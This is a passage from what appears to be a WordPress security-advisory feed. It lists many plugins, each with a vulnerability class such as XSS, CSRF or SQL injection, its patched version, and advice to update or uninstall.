Recommended Action: Update to version 3.3.18, or a newer patched version

Plugin: HTML filter and csv-file search

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: GDPR Cookie Consent by Supsystic

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Font Awesome More Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpForo Forum

Vulnerability: Cross-Site Scripting via langid parameter
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Authenticated (Shop Manager+) PHP Object Injection via create_dummy_vendor
Patched Version: 3.7.20
Recommended Action: Update to version 3.7.20, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Smart Floating / Sticky Buttons – Call, Sharing, Chat Widgets & More – Buttonizer

Vulnerability: Smart Floating Action Button <= 2.5.4
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: BuddyPress

Vulnerability: Missing Authorization to Group Creation
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: Survey Maker

Vulnerability: Reflected Cross-Site Scripting via ‘page’ parameter
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: Dynamic Word Spinner: CSS3 Animated Rotation

Vulnerability: Cross-Site Request Forgery via save_admin_options
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Genki Pre-Publish Reminder

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WIP Custom Login

Vulnerability: Cross-Site Request Forgery via save_option
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.77.3
Recommended Action: Update to version 2.0.77.3, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Authenticated (Admin+) Arbitrary Options Update
Patched Version: 9.7.2
Recommended Action: Update to version 9.7.2, or a newer patched version

Plugin: simple-popup-images

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: GS Insever Portfolio

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Order Export & Order Import for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Arbitrary File Upload via upload_import_file
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 0.9.69
Recommended Action: Update to version 0.9.69, or a newer patched version

Plugin: Portfolio – WordPress Portfolio Plugin

Vulnerability: Cross-Site Request Forgery in rtport_spare_me
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: WP Category Post List Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Portrait-Archiv.com Photostore

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: 3D FlipBook – PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 1.12.1
Recommended Action: Update to version 1.12.1, or a newer patched version

Plugin: Leads and Visitor Insights

Vulnerability: Authorization Bypass
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Export All Posts, Products, Orders, Refunds & Users

Vulnerability: SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: wp-football

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Form Builder CP

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.32
Recommended Action: Update to version 1.2.32, or a newer patched version

Plugin: EU Cookie Law for GDPR/CCPA

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Reflected Cross-Site Scripting via code
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Plugin: Helpful

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.4.59
Recommended Action: Update to version 4.4.59, or a newer patched version

Plugin: AGCA – Custom Dashboard & Login Page

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: Visual Website Collaboration, Feedback & Project Management – Atarim

Vulnerability: Client Interface <= 3.9.1
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: CKEditor for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.3.1
Recommended Action: Update to version 4.5.3.1, or a newer patched version

Plugin: IBPS Online Exam Plugin for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Scripting via Customizer
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Dyslexiefont Free

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: RokStories

Vulnerability: Denial of Service
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: Author Box, Guest Author and Co-Authors for Your Posts – Molongui

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: Simple Ticker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.06
Recommended Action: Update to version 3.06, or a newer patched version

Plugin: Rich Reviews by Starfish

Vulnerability: SQL Injection
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: SpiderVPlayer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce

Vulnerability: Missing File Type Validation
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: Poll, Survey, Questionnaire and Voting system

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Shield: Blocks Bots, Protects Users, and Prevents Security Breaches

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 17.0.18
Recommended Action: Update to version 17.0.18, or a newer patched version

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Insecure Direct Object Reference
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Motors – Car Dealer, Classifieds & Listing

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: PCA Predict

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 115
Recommended Action: Update to version 115, or a newer patched version

Plugin: Organization chart

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Request Forgery via admin_slides
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gestion-Pymes

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: 4.1.5.2 Authorization Bypass
Patched Version: 4.1.5.3
Recommended Action: Update to version 4.1.5.3, or a newer patched version

Plugin: Simple Membership

Vulnerability: Authenticated (Admin+) SQL Injections
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: WooCommerce Warranty Requests

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Dynamics 365 Integration

Vulnerability: Missing Authorization via wp_ajax_wpcrm_log & wp_ajax_wpcrm_log_verbosity
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: Tiny carousel horizontal slider plus

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: jRSS Widget

Vulnerability: Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: External Videos

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Auto Hide Admin Bar

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Converter for Media – Optimize images | Convert WebP & AVIF

Vulnerability: Unauthenticated Open Redirect
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: bbp style pack

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.6.8
Recommended Action: Update to version 5.6.8, or a newer patched version

Plugin: reCaptcha by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.28
Recommended Action: Update to version 1.28, or a newer patched version

Plugin: Mondial Relay & Chronopost plugin for WooCommerce – WCMultiShipping

Vulnerability: WCMultiShipping <= 2.3.7
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: contus-video-comments

Vulnerability: Remote File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WHA Crossword

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpDataTables (Premium)

Vulnerability: Blind SQL Injection via length Parameter
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Simple Link Directory

Vulnerability: Unauthenticated SQL Injection
Patched Version: 7.7.2
Recommended Action: Update to version 7.7.2, or a newer patched version

Plugin: XML for Google Merchant Center

Vulnerability: Reflected Cross-Site Scripting via page parameter
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Member Hero

Vulnerability: Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AFS Analytics

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.16
Recommended Action: Update to version 4.16, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Pricing Table by Supsystic

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting and Setting Changes
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: WP SEO Tags

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kanban Boards for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.5.21
Recommended Action: Update to version 2.5.21, or a newer patched version

Plugin: Booqable Rental Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.16
Recommended Action: Update to version 2.4.16, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated SQL Injection via order & orderby Parameters
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Login with phone number

Vulnerability: Unauthenticated Remote Plugin Deletion
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Permalink Manager Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.20.2
Recommended Action: Update to version 2.2.20.2, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Cross-Site Scripting
Patched Version: .52.5
Recommended Action: Update to version .52.5, or a newer patched version

Plugin: Testimonial WordPress Plugin – AP Custom Testimonial

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.29
Recommended Action: Update to version 3.1.29, or a newer patched version

Plugin: Dropshipping & Affiliation with Amazon

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Admin side data storage for Contact Form 7

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OneClick Chat to Order

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.4.2
Recommended Action: Update to version 1.0.4.2, or a newer patched version

Plugin: Yandex Metrica Counter

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Menu Extension

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Scripting
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.2.6
Recommended Action: Update to version 6.4.2.6, or a newer patched version

Plugin: Image Export

Vulnerability: Path Traversal
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: SAML Single Sign On – SSO Login

Vulnerability: Cross-Site Scripting
Patched Version: 4.8.73
Recommended Action: Update to version 4.8.73, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: LayerSlider

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: AnyMind Widget

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: DOM-based Cross-Site Scripting
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: Trust Payments Gateway for WooCommerce (JavaScript Library)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service via oEmbed Protocol
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.9.4
Recommended Action: Update to version 1.9.4, or a newer patched version

Plugin: Download Monitor

Vulnerability: Cross-Site Scripting via sort Parameter
Patched Version: 3.3.6.2
Recommended Action: Update to version 3.3.6.2, or a newer patched version

Plugin: qTranslate X

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization

Vulnerability: Subscriber+ Arbitrary Settings Update
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: Display Widgets

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.04
Recommended Action: Update to version 2.04, or a newer patched version

Plugin: WCP Contact Form

Vulnerability: Missing Authorization via downloadCsv
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Activity Log

Vulnerability: Authenticated (Administrator+) SQL Injection via txtsearch
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Complianz Premium – GDPR/CCPA Cookie Consent

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.8
Recommended Action: Update to version 6.4.8, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_start_cdn_integration_ajax_request_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: VR Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: AJAX Random Posts

Vulnerability: PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.16.66
Recommended Action: Update to version 1.16.66, or a newer patched version

Plugin: Waiting: One-click countdowns

Vulnerability: Authenticated (Subscriber+) SQL Injection via ‘pbc_down[meta][id]’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.27
Recommended Action: Update to version 6.0.27, or a newer patched version

Plugin: Meta pixel for WordPress

Vulnerability: PHP Object Injection
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Podcast Subscribe Buttons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.74
Recommended Action: Update to version 3.74, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Admin+ SQL Injection
Patched Version: 4.7.5
Recommended Action: Update to version 4.7.5, or a newer patched version

Plugin: Inspirational Quote Rotator

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Responsive Testimonials Slider And Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Podlove Podcast Publisher

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Subscriber+ SQL Injection
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Server-Side Request Forgery
Patched Version: 1.0.95.1
Recommended Action: Update to version 1.0.95.1, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: MP3-jPlayer

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 8.0.1
Recommended Action: Update to version 8.0.1, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Missing Authorization via redirect_pay_for_order_to_update_payment_method
Patched Version: 5.9.1
Recommended Action: Update to version 5.9.1, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated WordPress Options Changes via AJAX
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Local File Inclusion
Patched Version: 3.7.19
Recommended Action: Update to version 3.7.19, or a newer patched version

Plugin: Contact Form 7

Vulnerability: Authorization Bypass
Patched Version: 5.0.4
Recommended Action: Update to version 5.0.4, or a newer patched version

Plugin: MapSVG

Vulnerability: SQL Injection
Patched Version: 6.2.20
Recommended Action: Update to version 6.2.20, or a newer patched version

Plugin: Event Notifier

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Google Alert and Twitter Plugin

Vulnerability: Multiple Vulnerabilities
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Table

Vulnerability: Local File Inclusion
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Multiple SQL Injections
Patched Version: 2.7.97
Recommended Action: Update to version 2.7.97, or a newer patched version

Plugin: Flat Preloader

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Work The Flow File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated Arbitrary File Deletion
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Contributor+ Arbitrary Thumbnail Removal
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: WP STAGING WordPress Backup Plugin – Migration Backup Restore

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.9.18
Recommended Action: Update to version 2.9.18, or a newer patched version

Plugin: WP Mega Menu

Vulnerability: Unauthenticated Settings Update to Stored Cross-Site Scripting
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Interactive Image Map Plugin – Draw Attention

Vulnerability: Missing Authorization to Arbitrary Post Featured Image Modification
Patched Version: 2.0.12
Recommended Action: Update to version 2.0.12, or a newer patched version

Plugin: Display Custom Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LB Mixed Slideshow for WordPress

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: leenk.me

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Easy Digital Downloads – Upload File

Vulnerability: Arbitrary File Upload/Deletion
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Conversion Ninja

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Admin Management Xtended

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: Facebook Survey Pro

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Domain Redirect

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Nexter Extension

Vulnerability: Authenticated (Editor+) Remote Code Execution via metabox
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: OnePress Social Locker

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: SQL Injection
Patched Version: 1.9.0
